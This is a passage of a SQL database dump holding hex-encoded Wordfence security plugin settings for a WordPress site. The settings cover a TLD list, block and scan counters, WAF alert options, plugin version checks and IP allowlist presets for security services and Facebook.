('tldlist', 0x7c636f6d7c6f72677c6e65747c6564757c6161617c6162627c6162637c61636f7c6164737c6165677c61666c7c6169677c616e7a7c616f6c7c6170707c6172747c6177737c6178617c6261727c6262637c6262747c6263677c62636e7c6265747c6269647c62696f7c62697a7c626d737c626d777c626f6d7c626f6f7c626f747c626f787c6275797c627a687c6361627c63616c7c63616d7c6361727c6361747c6362617c63626e7c6362737c6365627c63656f7c6366617c6366647c6370617c6372737c6373637c6461647c6461797c6464737c6465767c64686c7c6469797c646e707c646f677c646f747c6474767c6476727c6561747c65636f7c6573717c6575737c66616e7c6669747c666c797c666f6f7c666f787c66726c7c6674727c66756e7c6679697c67616c7c6761707c6761797c67646e7c6765617c676c657c676d6f7c676d787c676f6f7c676f707c676f747c676f767c68626f7c6869767c686b747c686f747c686f777c69626d7c6963657c6963757c69666d7c696e637c696e677c696e6b7c696e747c6973747c6974767c6a63627c6a63707c6a696f7c6a6c6c7c6a6d707c6a6e6a7c6a6f747c6a6f797c6b66687c6b69617c6b696d7c6b706e7c6b72647c6c61747c6c61777c6c64737c6c6c637c6c6c707c6c6f6c7c6c706c7c6c74647c6d616e7c6d61707c6d62617c6d65647c6d656e7c6d696c7c6d69747c6d6c627c6d6c737c6d6d617c6d6f657c6d6f697c6d6f6d7c6d6f767c6d73647c6d746e7c6d74727c6e61627c6e62617c6e65637c6e65777c6e666c7c6e676f7c6e686b7c6e6f777c6e72617c6e72777c6e74747c6e79637c6f62697c6f66667c6f6e657c6f6e677c6f6e6c7c6f6f6f7c6f74747c6f76687c7061797c7065747c7068647c7069647c70696e7c706e637c70726f7c7072757c7075627c7077637c7176637c7265647c72656e7c72696c7c72696f7c7269707c72756e7c7277657c7361707c7361737c7362697c7362737c7363617c7363627c7365737c7365777c7365787c7366727c736b697c736b797c736f797c73726c7c7374637c7461627c7461787c7463697c74646b7c74656c7c7468647c746a787c746f707c7472767c7475697c7476737c7562737c756e6f7c756f6c7c7570737c7665747c7669677c76696e7c7669707c7765647c77696e7c776d657c776f777c7774637c7774667c78696e7c7878787c78797a7c796f757c79756e7c7a69707c61637c61647c61657c61667c61677c61697c616c7c616d7c616f7c61717c61727c61737c61747c61757c61777c61787c617a7c62617c62627c62647c62657c62667c62677c62687c62697c626a7c626d7c626e7c626f7c62727c62737c62747c62767c62777c62797c627a7c63617c63637c63647c63667c63677c63687c63697c636b7c636c7c636d7c636e7c636f7c63727c63757c63767c63777c63787c63797c637a7c64657c646a7c646b7c646d7c646f7c647a7c65637c65657c65677c65727c65737c65747c65757c66697c666a7c666b7c666d7c666f7c66727c67617c67627c67647c67657c67667c67677c67687c67697c676c7c676d7c676e7c67707c67717c67727c67737c67747c67757c67777c67797c686b7c686d7c686e7c68727c68747c68757c69647c69657c696c7c696d7c696e7c696f7c69717c69727c69737c69747c6a657c6a6d7c6a6f7c6a707c6b657c6b677c6b687c6b697c6b6d7c6b6e7c6b707c6b727c6b777c6b797c6b7a7c6c617c6c627c6c637c6c697c6c6b7c6c727c6c737c6c747c6c757c6c767c6c797c6d617c6d637c6d647c6d657c6d677c6d687c6d6b7c6d6c7c6d6d7c6d6e7c6d6f7c6d707c6d717c6d727c6d737c6d747c6d757c6d767c6d777c6d787c6d797c6d7a7c6e617c6e637c6e657c6e667c6e677c6e697c6e6c7c6e6f7c6e707c6e727c6e757c6e7a7c6f6d7c70617c70657c70667c70677c70687c706b7c706c7c706d7c706e7c70727c70737c70747c70777c70797c71617c72657c726f7c72737c72757c72777c73617c73627c73637c73647c73657c73677c73687c73697c736a7c736b7c736c7c736d7c736e7c736f7c73727c73737c73747c73757c73767c73787c73797c737a7c74637c74647c74667c74677c74687c746a7c746b7c746c7c746d7c746e7c746f7c74727c74747c74767c74777c747a7c75617c75677c756b7c75737c75797c757a7c76617c76637c76657c76677c76697c766e7c76757c77667c77737c79657c79747c7a617c7a6d7c7a777c616172707c61626c657c616461637c6165726f7c616b646e7c616c6c797c616d65787c616d6963617c617261627c61726d797c617270617c617274657c617364617c61726368697c617369617c616c73746f6d7c616d66616d7c617564697c6175746f7c6170706c657c61756469626c657c617564696f7c616c736163657c61756374696f6e7c6175746f737c616d617a6f6e7c617a7572657c6174686c6574617c62616e647c62616e6b7c616e7175616e7c617574686f727c617669616e63617c626162797c62616964757c616e64726f69647c6172616d636f7c617573706f73747c62616e616d65787c62616e616e6172657075626c69637c626276617c626573747c6162627669657c626565727c62696b657c62696e677c6163746f727c6162626f74747c636173687c6365726e7c636861747c636974697c636c75627c6275696c647c636272657c63686173657c636974797c636f6f6c7c646174657c64636c6b7c6465616c7c64656c6c7c646573697c6c696d6f7c6c657875737c6c6966657c6164756c747c6c65676f7c6c6762747c6c696b657c6c6567616c7c6c696e6b7c6c6f616e7c6c6f66747c6c6f76657c6e616d657c6c656173657c6e6176797c6162617274687c6d6f746f7c63686561707c64656c74617c6c6976657c6e696e6a617c6e697373616e7c6e69737361797c6e6f6b69617c6e6f72746f6e7c6e6f7772757a7c61626f6761646f7c6165746e617c61636164656d797c62617965726e7c6261736b657462616c6c7c626c6f677c626c75657c626175686175737c62656174737c626f66617c626f6e647c626f6f6b7c62757a7a7c636166657c63616c6c7c63616d707c636172657c636172737c636173617c636173657c636f6f707c63796f757c646174617c646965747c63616e6f6e7c646973687c646f63737c6b7265647c6c616e647c6c69646c7c6c7464617c6c7578657c6b796f746f7c6d656d657c6d696e697c6d696e747c6c616d65727c6d6169667c6d6565747c6d656e757c6d6f62697c6d6f64617c6e6577737c6e6578747c6e696b657c63617264737c6e657875737c6e69636f7c6e696b6f6e7c6f6c6c6f7c6f70656e7c6169726275737c706167657c706172737c706963737c62617265666f6f747c70696e677c6269626c657c70696e6b7c706c61797c61697274656c7c706c75737c616c69626162617c616c697061797c626172636c6179737c62617263656c6f6e617c626172636c6179636172647c706f686c7c62696e676f7c626c61636b7c626f6174737c636973636f7c636c6f75647c63726f776e7c64616275727c6c7570696e7c6167616b68616e7c63796d72757c64616e63657c6c696c6c797c6d616379737c6d616e676f7c706363777c6166726963617c6d656469617c6d69616d697c6d6f7669657c6e6f7774767c6f6d6567617c6167656e63797c6261726761696e737c626f7363687c63697469637c636c69636b7c636f6163687c636f6465737c6465616c737c6c696e64657c6c697073797c6c6978696c7c6c6f616e737c6c6f6375737c6c6f7474657c6c6f74746f7c6d6f6e65797c6f7261636c657c6f72616e67657c70617274797c6f6e6c696e657c7066697a65727c6261736562616c6c7c70617269737c6f66666963657c6f6c6179616e7c6f73616b617c6f7473756b617c70617274737c646f6d61696e737c6475636b7c647661677c65726e697c666167657c66616e737c6661726d7c666173747c666961747c6669646f7c66696c6d7c666972657c616972666f7263657c6661696c7c616c6661726f6d656f7c616d65726963616e657870726573737c666973687c666c69727c666f6f647c666f72647c676966747c666f72756d7c676d62687c676f6c647c676f6c667c676f6f677c666f7265787c676c6f626f7c676d61696c7c616c6c73746174657c667265657c66756e647c67696674737c676c6164657c676c6173737c616c6c66696e616e7a7c67616c6c6f7c67616d657c6762697a7c67656e747c676765657c67616d65737c67697665737c6b706d677c706f726e7c78626f787c7a6172617c61627564686162697c64726976657c7465616d7c746563687c796f67617c64756261697c65617274687c737461727c746576617c7a65726f7c6564656b617c737572667c746178697c7a6f6e657c656d61696c7c74616c6b7c6570736f6e7c616363656e747572657c6163636f756e74616e747c66696e616c7c746970737c76616e617c766973617c766f74657c66656465787c766976617c7669766f7c66616974687c746961617c746f776e7c746f79737c747562657c766f746f7c77616e677c776569727c7769656e7c77696b697c77696e657c6163636f756e74616e74737c776f726b7c6166616d696c79636f6d70616e797c677265656e7c677567657c686175737c68656c707c686f73747c687362637c67726f75707c68796174747c61706172746d656e74737c677572757c686169727c686466637c686572657c686774767c686f7573657c696362637c696d64627c726569747c69726973687c706f73747c696b616e6f7c696d6d6f7c696e666f7c697461757c6a6176617c6171756172656c6c657c696565657c72656e747c697665636f7c6a6565707c6a6f62737c6a7072737c6b6464697c6b6977697c71706f6e7c726561647c706861726d6163797c70726f647c726169647c7068696c6970737c70726f667c726573747c616e616c79746963737c6174746f726e65797c67726970657c67756363697c67756964657c686f6d65737c686f7273657c726f6f6d7c686f6e64617c726d69747c696e74656c7c6f6b696e6177617c616d7374657264616d7c6b6f656c6e7c6f6c646e6176797c6173736f6369617465737c6e6f7274687765737465726e6d757475616c7c726963687c6a65747a747c646f776e6c6f61647c6f627365727665727c6f6e796f7572736964657c727376707c70616e61736f6e69637c736166657c73616c657c616d65726963616e66616d696c797c6f6c6179616e67726f75707c6f7267616e69637c6f726967696e737c727568727c7361726c7c736176657c706172746e6572737c7361786f7c736561747c7365656b7c736578797c736861777c736869617c706173736167656e737c73636f747c73686f707c73686f777c73696c6b7c73696e617c736974657c736b696e7c736e63667c736f68757c736f6e677c736f6e797c73706f747c70686f6e657c736f6c61727c746f74616c7c6265617574797c6265726c696e7c6268617274697c626f7374696b7c626f73746f6e7c73706f72747c62726f6b65727c736d6172747c736d696c657c73746f72657c62726f746865727c627567617474697c736b7970657c736c696e677c73746164617c63616d6572617c636c61696d737c636f666665657c636f6d7365637c6361706974616c7c6368726f6d657c73776973737c6361736569687c636173696e6f7c6361726176616e7c6361726565727c6368757263687c636f6e646f737c73747564797c636172656572737c636972636c657c636c696e69637c636f6d636173747c636f6d6d62616e6b7c636f6d6d756e6974797c636f6d70616e797c7375636b737c6368616e656c7c636f6c6f676e657c636f6d706172657c636f6d70757465727c636f6e737472756374696f6e7c7374796c657c63656e7465727c636f6e73756c74696e677c636f6e746163747c676f6f676c657c626f6f6b696e677c636c696e697175657c73616c6f6e7c62656e746c65797c6865616c74687c626573746275797c636861726974797c6368696e7461697c6369707269616e697c6369746164656c7c63697479656174737c6772617469737c6368616e6e656c7c636c65616e696e677c6865726d65737c73656e65727c73686f65737c7361666574797c73616b7572617c636f6c6c6567657c686970686f707c686f74656c737c6875676865737c73616e6f66697c636c75626d65647c686f636b65797c696d616d61747c7363686f6f6c7c736368756c657c736576656e7c73686172707c7368656c6c7c7365617263687c7365637572657c73656c6563747c73686f756a697c736f6369616c7c73747265616d7c73747564696f7c737570706c797c73757a756b697c7377617463687c7379646e65797c636c6f7468696e677c736f636365727c636f6f6b696e677c64656e74616c7c6578706572747c666c69636b727c67616c6c75707c76656761737c766964656f7c6576656e74737c766f646b617c766f6c766f7c77616c65737c667574626f6c7c77617463687c77656265727c646174696e677c64617473756e7c6573746174657c67617264656e7c776569626f7c66616d696c797c776f726b737c6465616c65727c6469726563747c656d6572636b7c776f726c647c646f63746f727c7865726f787c64756e6c6f707c6475706f6e747c64757262616e7c676c6f62616c7c7961686f6f7c636f75706f6e7c6372656469747c6372756973657c6465677265657c64657369676e7c656e657267797c67656f7267657c676976696e677c696e737572657c73706163657c7461697065697c74697265737c7469726f6c7c746d616c6c7c746f6461797c746f6b796f7c746f6f6c737c74616f62616f7c74656e6e69737c636f72736963617c636f6f6b696e676368616e6e656c7c74617461727c7461726765747c746a6d6178787c746b6d6178787c636f6e74726163746f72737c746174746f6f7c7469656e64617c746f7261797c746f7572737c74726164657c7562616e6b7c746f796f74617c74727573747c74756e65737c74757368757c74726176656c7c756e69636f6d7c7669616a65737c76696b696e677c76696c6c61737c76697267696e7c766973696f6e7c766f74696e677c766f796167657c7675656c6f737c77616c7465727c77656263616d7c78696875616e7c7961636874737c79616e6465787c7a6170706f737c636f756e7472797c64656e746973747c66697368696e677c65786368616e67657c666964656c6974797c66696e616e63657c6c61777965727c66696e616e6369616c7c6669746e6573737c6669726573746f6e657c6669726d64616c657c666c69676874737c66726f67616e737c6c65636c6572637c64656d6f637261747c66756a697473757c6c6174696e6f7c64656c69766572797c666c6f726973747c666f7273616c657c65746973616c61747c666c6f776572737c6c656672616b7c6d616b6575707c6661726d6572737c666572726172697c6c75787572797c66617368696f6e7c6c6f6e646f6e7c6578706f7365647c657870726573737c666565646261636b7c6d61726b65747c637269636b65747c637275697365737c6469676974616c7c6665727265726f7c6c6976696e677c6d6169736f6e7c6c6174726f62657c6c696d697465647c6c696e636f6c6e7c6d61647269647c6d61726b6574696e677c7279756b79757c64656c6f697474657c67616c6c6572797c67656e74696e677c6c6f636b65727c6c756e646265636b7c6d61726b6574737c626f7574697175657c627261646573636f7c62726f61647761797c6272757373656c737c62756461706573747c7069637465747c74696666616e797c6275696c646572737c646973636f756e747c6572696373736f6e7c66726f6e74646f6f727c66726f6e746965727c66726573656e6975737c66756a697865726f787c6675726e69747572657c7469636b6574737c6469616d6f6e64737c646973636f7665727c656e67696e6565727c666f6f7462616c6c7c6c6966657374796c657c70686f746f7c70686f746f737c70687973696f7c746f73686962617c6c69676874696e677c74726164696e677c6d617272696f74747c746865617472657c6d617365726174697c6d6f62696c657c6d6f6e6173687c6d6f6e737465727c6d6f726d6f6e7c7866696e6974797c6d6f7274676167657c6d6f73636f777c6d757365756d7c6d757475616c7c6e61676f79617c79616d6178756e7c796f75747562657c6469726563746f72797c6d65746c6966657c6d6572636b6d73647c6e61747572617c656475636174696f6e7c6e657462616e6b7c6d656d6f7269616c7c6e6574666c69787c6e6574776f726b7c70696374757265737c6661697277696e64737c6d617474656c7c6e6575737461727c6d636b696e7365797c65717569706d656e747c7a7565726963687c6d61727368616c6c737c736161726c616e647c626c61636b6672696461797c776174636865737c626c6f6f6d626572677c6d6963726f736f66747c746865617465727c747261696e696e677c76656e74757265737c766572697369676e7c77616c6d6172747c74726176656c6572737c77616e67676f757c776561746865727c77686f7377686f7c6d656c626f75726e657c776562736974657c626e70706172696261737c7661636174696f6e737c77656464696e677c77696e646f77737c77696e6e6572737c76616e67756172647c776f6f64736964657c786e2d2d393061657c796f6b6f68616d617c786e2d2d39306169737c786e2d2d65316134637c786e2d2d6c316163637c626c6f636b6275737465727c786e2d2d703161697c786e2d2d63316176677c786e2d2d6e6f64657c786e2d2d6431616c667c786e2d2d66686265697c786e2d2d6a316165667c786e2d2d6a31616d687c786e2d2d6e676272787c786e2d2d6e717637667c786e2d2d70316163667c786e2d2d71786136617c786e2d2d7178616d7c786e2d2d74636b77657c786e2d2d76687175767c796f646f62617368697c626f656872696e6765727c68616e676f75747c6b696e6465727c6c6173616c6c657c677561726469616e7c677569746172737c67726170686963737c68616d627572677c686f746d61696c7c6361746572696e677c636174686f6c69637c677261696e6765727c686f6c696461797c686f6d656465706f747c656e67696e656572696e677c67726f636572797c6c616e786573737c6864666362616e6b7c72656861627c656e7465727072697365737c6a6577656c72797c686f6c64696e67737c6b696e646c657c68656c73696e6b697c666f756e646174696f6e7c686973616d697473757c686974616368697c686f74656c65737c686f6d65676f6f64737c6361706974616c6f6e657c686f7374696e677c686f73706974616c7c686f6d6573656e73657c6b617566656e7c6a756e697065727c6b69746368656e7c6575726f766973696f6e7c6a7565676f737c6a706d6f7267616e7c657874726173706163657c6865616c7468636172657c6a6f627572677c6879756e6461697c6d616e6167656d656e747c6d6974737562697368697c72656973657c6c6163616978617c72756762797c676f6c64706f696e747c696e737469747574657c63756973696e656c6c617c6a61677561727c676f64616464797c696e747569747c69736d61696c697c6368726973746d61737c6b6f736865727c6b6f6d617473757c6c616e6361737465727c6c616e6369617c6e6577686f6c6c616e647c696e766573746d656e74737c7265706f72747c696e737572616e63657c72656973656e7c7265706169727c7265766965777c636f75706f6e737c636f75727365737c726576696577737c72656c69616e63657c637265646974636172647c696e7465726e6174696f6e616c7c6c616e64726f7665727c6e6174696f6e776964657c72656e74616c737c726578726f74687c627573696e6573737c726f636865727c726f64656f7c63617065746f776e7c676f6f64796561727c696e66696e6974697c69706972616e67617c726f676572737c73616d73756e677c7363686d6964747c736369656e63657c697374616e62756c7c7269636f687c726f636b737c73616e6476696b7c73656375726974797c726963686172646c697c7363687761727a7c7368726972616d7c73616d73636c75627c73657276696365737c6d6f746f726379636c65737c73686f7070696e677c73686f7774696d657c696d6d6f62696c69656e7c7368696b7368617c696e64757374726965737c6b756f6b67726f75707c73636a6f686e736f6e7c7368616e6772696c617c6e6578746469726563747c70696f6e6565727c70697a7a617c706c6163657c706c756d62696e677c70726178697c62726964676573746f6e657c706f6b65727c706f6c697469657c70726573737c7072696d657c71756573747c726164696f7c7175656265637c726163696e677c7072616d65726963617c7265616c746f727c7265616c74797c726563697065737c70726f70657274797c72657075626c6963616e7c70726f64756374696f6e737c70726f6d6f7c7363686f6c617273686970737c73696e676c65737c72657374617572616e747c70726f67726573736976657c737461706c65737c72656473746f6e657c73746174656661726d7c73746367726f75707c7265616c6573746174657c73746f726167657c70726f706572746965737c666f6f646e6574776f726b7c736f667462616e6b7c736f6674776172657c736f6c7574696f6e737c737570706f72747c74656d6173656b7c737570706c6965737c737572676572797c73797374656d737c70727564656e7469616c7c746174616d6f746f72737c746563686e6f6c6f67797c726564756d6272656c6c617c736368616566666c65727c737461746562616e6b7c73746f636b686f6c6d7c70726f74656374696f6e7c7377696674636f7665727c756e69766572736974797c6c706c66696e616e6369616c7c73616e6476696b636f726f6d616e747c766c61616e646572656e7c766f6c6b73776167656e7c63616c76696e6b6c65696e7c63616e63657272657365617263687c637265646974756e696f6e7c6c616d626f726768696e697c6c696665696e737572616e63657c70686f746f6772617068797c706c617973746174696f6e7c74726176656c6368616e6e656c7c74726176656c657273696e737572616e63657c786e2d2d3330727237797c786e2d2d33707875386b7c786e2d2d3435713131637c786e2d2d34676272696d7c776561746865726368616e6e656c7c786e2d2d3535717835647c786e2d2d313162346333647c786e2d2d3930613361637c786e2d2d3965743532757c6b65727279686f74656c737c77696c6c69616d68696c6c7c786e2d2d317171773233617c786e2d2d327363726a39637c786e2d2d3362737430306d7c786e2d2d35747a6d35677c786e2d2d31636b326531627c786e2d2d336473343433677c786e2d2d3964627132617c786e2d2d343562726a39637c786e2d2d3666727a3832677c786e2d2d3830616478686b737c786e2d2d3830616f3231617c786e2d2d3671713938366233786c7c786e2d2d6332627237677c786e2d2d383061716563647231617c786e2d2d38306173656864627c786e2d2d3830617377677c786e2d2d336863726a39637c786e2d2d343263326439617c786e2d2d353571773432677c786e2d2d38793061303633617c786e2d2d353462376674613063637c786e2d2d35737533346a393336626773677c786e2d2d63636b326233627c786e2d2d33653062373037657c786e2d2d343562723563796c7c786e2d2d336f713138766c38706e3336617c786e2d2d6669713634627c786e2d2d6669717338737c786e2d2d6669717a39737c6b6572727970726f706572746965737c766572736963686572756e677c73707265616462657474696e677c6b657272796c6f676973746963737c786e2d2d637a727330747c786e2d2d637a727532647c776f6c746572736b6c757765727c786e2d2d636734626b697c786e2d2d63636b7763786574647c786e2d2d696f306137697c786e2d2d6b70757433697c786e2d2d396b72743030617c786e2d2d637a72363934627c786e2d2d643161636a33627c786e2d2d673278783438637c786e2d2d756e757034797c786e2d2d7767626831637c786e2d2d656676793838687c786e2d2d6663743432396b7c786e2d2d7767626c36617c786e2d2d7939613361717c786e2d2d666a71373230617c786e2d2d7073737932757c786e2d2d666c77333531657c786e2d2d67636b72336630667c786e2d2d676563726a39637c786e2d2d7137636536617c786e2d2d667a633263396532637c786e2d2d6a3677313933677c786e2d2d636c636863306561306232673261396763647c786e2d2d696d723531336e7c786e2d2d62636b316239613564726534637c786e2d2d6a76723138396d7c786e2d2d65636b7664746339647c786e2d2d6b7072773133647c786e2d2d623477363035666572647c786e2d2d666971323238633568737c786e2d2d676b33617431657c786e2d2d683262726a39637c786e2d2d687874383134657c786e2d2d683262726a396338637c786e2d2d6b7072793537647c786e2d2d6d6762747832627c786e2d2d683262726567336576657c786e2d2d69316236623161366132657c786e2d2d6c6762626174316164386a7c786e2d2d6d6762626831617c786e2d2d667063726a396333647c786e2d2d667a7973386436397576676d7c786e2d2d6d6978383931667c786e2d2d706762733064687c786e2d2d6a6c713438306e3272677c786e2d2d6d676239617762667c786e2d2d6d676261336133656a747c786e2d2d6d787471316d7c786e2d2d6d676274336468647c786e2d2d6d6b3162753434637c786e2d2d6d676261616d376138687c786e2d2d6d676261623262647c786e2d2d6d676267753832617c786e2d2d6d6762706c3266687c786e2d2d6d6762617968376770617c786e2d2d6d6762626831613731657c786e2d2d6d676261336134663136617c786e2d2d6d676261616b63376476667c786e2d2d6d676263306139617a63677c786e2d2d6d6762636137647a646f7c786e2d2d6d67626370713667706131617c786e2d2d6d6762616939617a677170366a7c786e2d2d6d6762657270346135643461727c786e2d2d6d6762693465636578707c786e2d2d6d67626168316133686a6b72647c786e2d2d6d6762783463643061627c786e2d2d6d67626137633062626e30617c786e2d2d7a6672313634627c786e2d2d6e67626335617a647c786e2d2d6e7971793236617c786e2d2d6e71763766733030656d617c786e2d2d71396a796234637c786e2d2d71636b6131706d637c786e2d2d6a6c71363175397737627c786e2d2d6f33637734687c786e2d2d6f7475373936647c786e2d2d6f6762706638666c7c786e2d2d726871763936677c786e2d2d733962726a39637c786e2d2d743630623536617c786e2d2d6e676265396530617c786e2d2d6b637278373764317834617c786e2d2d726f76753838627c786e2d2d727663316530616d33657c786e2d2d736573353534677c786e2d2d767571383631627c786e2d2d7734727334306c7c786e2d2d74697134397871796a7c786e2d2d7734723835656c3866687535646e72617c786e2d2d7966726f346936376f7c786e2d2d7665726d67656e73626572617465722d6374627c786e2d2d7665726d67656e736265726174756e672d7077627c786e2d2d786871353231627c786e2d2d786b6332616c3368796532617c786e2d2d7967626932616d6d787c786e2d2d786b6332646c336135656530687c, 'yes'),
('tldlistHash', 0x33643964613936333463643638653535356165616632646234333961613564613633613766313237663031373561616237363831653334656166393438346238, 'yes'),
('total503s', 0x32343139, 'yes'),
('totalAlertsSent', 0x3133, 'yes'),
('totalIPsBlocked', 0x32333938, 'yes'),
('totalIPsLocked', 0x3132, 'yes'),
('totalLoginHits', 0x3235383237, 'yes'),
('totalScansRun', 0x323433, 'yes'),
('touppBypassNextCheck', 0x30, 'yes'),
('touppPromptNeeded', 0x31, 'yes'),
('vulnerabilities_plugin', 0x613a363a7b693a303b613a353a7b733a343a22736c7567223b733a393a22776f726466656e6365223b733a393a22746f56657273696f6e223b733a363a22372e342e3130223b733a31313a2266726f6d56657273696f6e223b733a353a22372e342e35223b733a31303a2276756c6e657261626c65223b623a303b733a343a226c696e6b223b623a303b7d693a313b613a343a7b733a343a22736c7567223b733a31343a2277702d73757065722d6361636865223b733a31313a2266726f6d56657273696f6e223b733a353a22312e372e31223b733a31303a2276756c6e657261626c65223b623a303b733a343a226c696e6b223b623a303b7d693a323b613a343a7b733a343a22736c7567223b733a31373a2275732d6865616465722d6275696c646572223b733a31313a2266726f6d56657273696f6e223b733a353a22322e312e32223b733a31303a2276756c6e657261626c65223b623a303b733a343a226c696e6b223b623a303b7d693a333b613a343a7b733a343a22736c7567223b733a393a22726576736c69646572223b733a31313a2266726f6d56657273696f6e223b733a373a22352e342e372e34223b733a31303a2276756c6e657261626c65223b623a303b733a343a226c696e6b223b623a303b7d693a343b613a343a7b733a343a22736c7567223b733a31383a22556c74696d6174655f56435f4164646f6e73223b733a31313a2266726f6d56657273696f6e223b733a373a22332e31362e3234223b733a31303a2276756c6e657261626c65223b623a303b733a343a226c696e6b223b623a303b7d693a353b613a343a7b733a343a22736c7567223b733a31313a226a735f636f6d706f736572223b733a31313a2266726f6d56657273696f6e223b733a333a22362e31223b733a31303a2276756c6e657261626c65223b623a303b733a343a226c696e6b223b623a303b7d7d, 'yes'),
('wafAlertInterval', 0x363030, 'yes'),
('wafAlertLastSendTime', 0x31353930373937353136, 'yes'),
('wafAlertOnAttacks', 0x31, 'yes'),
('wafAlertThreshold', 0x313030, 'yes'),
('wafAlertWhitelist', '', 'yes'),
('wafStatusCallbackNonce', '', 'yes'),
('waf_status', 0x6c6561726e696e672d6d6f6465, 'yes'),
('wfKillRequested', 0x30, 'no'),
('wfPeakMemory', 0x3134363830303634, 'no'),
('wfScanStartVersion', 0x352e332e34, 'yes'),
('wfsd_engine', '', 'no'),
('wfStatusStartMsgs', 0x613a323a7b693a303b733a303a22223b693a313b733a303a22223b7d, 'yes'),
('wf_scanLastStatusTime', 0x30, 'yes'),
('wf_scanRunning', '', 'yes'),
('wf_summaryItems', 0x613a383a7b733a31323a227363616e6e6564506f737473223b693a303b733a31353a227363616e6e6564436f6d6d656e7473223b693a303b733a31323a227363616e6e656446696c6573223b693a303b733a31343a227363616e6e6564506c7567696e73223b693a303b733a31333a227363616e6e65645468656d6573223b693a303b733a31323a227363616e6e65645573657273223b693a303b733a31313a227363616e6e656455524c73223b693a303b733a31303a226c617374557064617465223b693a313539363938303639343b7d, 'yes'),
('whitelisted', '', 'yes'),
('whitelistedServices', 0x7b7d, 'yes'),
('whitelistHash', 0x62663364373664633035636166383632336362336665303163316663396533303865326632656133376238323639333764383530666465333631636465666434, 'yes');
INSERT INTO `zdenl_wfconfig` (`name`, `val`, `autoload`) VALUES
('whitelistPresets', 0x7b22776f726466656e6365223a7b226e223a22576f726466656e6365222c2268223a747275652c2264223a747275652c2266223a747275652c2272223a5b2235342e36382e33322e323437222c2236392e34362e33362e305c2f3237222c22323630353a323430303a303130343a303130303a3a5c2f3536225d7d2c22737563757269223a7b226e223a22537563757269222c2264223a747275652c2272223a5b2239372e37342e3132372e313731222c2236392e3136342e3230332e313732222c223137332e3233302e3132382e313335222c2236362e3232382e33342e3439222c2236362e3232382e34302e313835222c2235302e3131362e33362e3932222c2235302e3131362e33362e3933222c2235302e3131362e332e313731222c223139382e35382e39362e323132222c2235302e3131362e36332e323231222c223139322e3135352e39322e313132222c223139322e38312e3132382e3331222c223139382e35382e3130362e323434222c223139322e3135352e39352e313339222c2232332e3233392e392e323237222c223139382e35382e3131322e313033222c223139322e3135352e39342e3433222c223136322e3231362e31362e3333222c223137332e3235352e3233332e313234222c223137332e3235352e3233332e313234222c223139322e3135352e39302e313739222c2235302e3131362e34312e323137222c223139322e38312e3132392e323237222c223139382e35382e3131312e3830222c223136322e3231362e31392e313833225d7d2c2266616365626f6f6b223a7b226e223a2246616365626f6f6b222c2264223a747275652c2272223a5b2236392e36332e3137362e305c2f3230222c2236362e3232302e3134342e305c2f3230222c2236362e3232302e3134342e305c2f3231222c2236392e36332e3138342e305c2f3231222c2236392e36332e3137362e305c2f3231222c2237342e3131392e37362e305c2f3232222c2236392e3137312e3235352e305c2f3234222c223137332e3235322e36342e305c2f3138222c2236392e3137312e3232342e305c2f3139222c2236392e3137312e3232342e305c2f3230222c223130332e342e39362e305c2f3232222c2236392e36332e3137362e305c2f3234222c223137332e3235322e36342e305c2f3139222c223137332e3235322e37302e305c2f3234222c2233312e31332e36342e305c2f3138222c2233312e31332e32342e305c2f3231222c2236362e3232302e3135322e305c2f3231222c2236362e3232302e3135392e305c2f3234222c2236392e3137312e3233392e305c2f3234222c2236392e3137312e3234302e305c2f3230222c2233312e31332e36342e305c2f3139222c2233312e31332e36342e305c2f3234222c2233312e31332e36352e305c2f3234222c2233312e31332e36372e305c2f3234222c2233312e31332e36382e305c2f3234222c2233312e31332e36392e305c2f3234222c2233312e31332e37302e305c2f3234222c2233312e31332e37312e305c2f3234222c2233312e31332e37322e305c2f3234222c2233312e31332e37332e305c2f3234222c2233312e31332e37342e305c2f3234222c2233312e31332e37352e305c2f3234222c2233312e31332e37362e305c2f3234222c2233312e31332e37372e305c2f3234222c2233312e31332e39362e305c2f3139222c2233312e31332e36362e305c2f3234222c223137332e3235322e39362e305c2f3139222c2236392e36332e3137382e305c2f3234222c2233312e31332e37382e305c2f3234222c2233312e31332e37392e305c2f3234222c2233312e31332e38302e305c2f3234222c2233312e31332e38322e305c2f3234222c2233312e31332e38332e305c2f3234222c2233312e31332e38342e305c2f3234222c2233312e31332e38352e305c2f3234222c2233312e31332e38362e305c2f3234222c2233312e31332e38372e305c2f3234222c2233312e31332e38382e305c2f3234222c2233312e31332e38392e305c2f3234222c2233312e31332e39302e305c2f3234222c2233312e31332e39312e305c2f3234222c2233312e31332e39322e305c2f3234222c2233312e31332e39332e305c2f3234222c2233312e31332e39342e305c2f3234222c2233312e31332e39352e305c2f3234222c2236392e3137312e3235332e305c2f3234222c2236392e36332e3138362e305c2f3234222c2233312e31332e38312e305c2f3234222c223137392e36302e3139322e305c2f3232222c223137392e36302e3139322e305c2f3234222c223137392e36302e3139332e305c2f3234222c223137392e36302e3139342e305c2f3234222c223137392e36302e3139352e305c2f3234222c223138352e36302e3231362e305c2f3232222c2234352e36342e34302e305c2f3232222c223138352e36302e3231362e305c2f3234222c223138352e36302e3231372e305c2f3234222c223138352e36302e3231382e305c2f3234222c223138352e36302e3231392e305c2f3234222c223132392e3133342e302e305c2f3136222c223135372e3234302e302e305c2f3136222c223135372e3234302e382e305c2f3234222c223135372e3234302e302e305c2f3234222c223135372e3234302e312e305c2f3234222c223135372e3234302e322e305c2f3234222c223135372e3234302e332e305c2f3234222c223135372e3234302e342e305c2f3234222c223135372e3234302e352e305c2f3234222c223135372e3234302e362e305c2f3234222c223135372e3234302e372e305c2f3234222c223135372e3234302e392e305c2f3234222c223135372e3234302e31302e305c2f3234222c223135372e3234302e31362e305c2f3234222c223135372e3234302e31392e305c2f3234222c223135372e3234302e31312e305c2f3234222c223135372e3234302e31322e305c2f3234222c223135372e3234302e31332e305c2f3234222c223135372e3234302e31342e305c2f3234222c223135372e3234302e31352e305c2f3234222c223135372e3234302e31372e305c2f3234222c223135372e3234302e31382e305c2f3234222c223135372e3234302e32302e305c2f3234222c223135372e3234302e32312e305c2f3234222c223135372e3234302e32322e305c2f3234222c223135372e3234302e32332e305c2f3234222c223135372e3234302e302e305c2f3137222c2236392e3137312e3235302e305c2f3234222c223135372e3234302e32342e305c2f3234222c223135372e3234302e32352e305c2f3234222c223139392e3230312e36342e305c2f3234222c223139392e3230312e36352e305c2f3234222c223139392e3230312e36342e305c2f3232222c223230342e31352e32302e305c2f3232222c223135372e3234302e3139322e305c2f3234222c223132392e3133342e302e305c2f3137222c223230342e31352e32302e305c2f3232222c22